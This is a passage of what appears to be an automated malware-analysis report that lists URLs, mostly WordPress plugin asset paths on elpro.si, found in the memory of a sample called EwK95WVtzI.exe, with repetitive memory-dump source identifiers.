                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/o
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si//
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/B
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/n
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/w
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/css/style.min.css?
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/js/search.min.js?v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=2.3.9
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/custom.js?ver=1.6
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 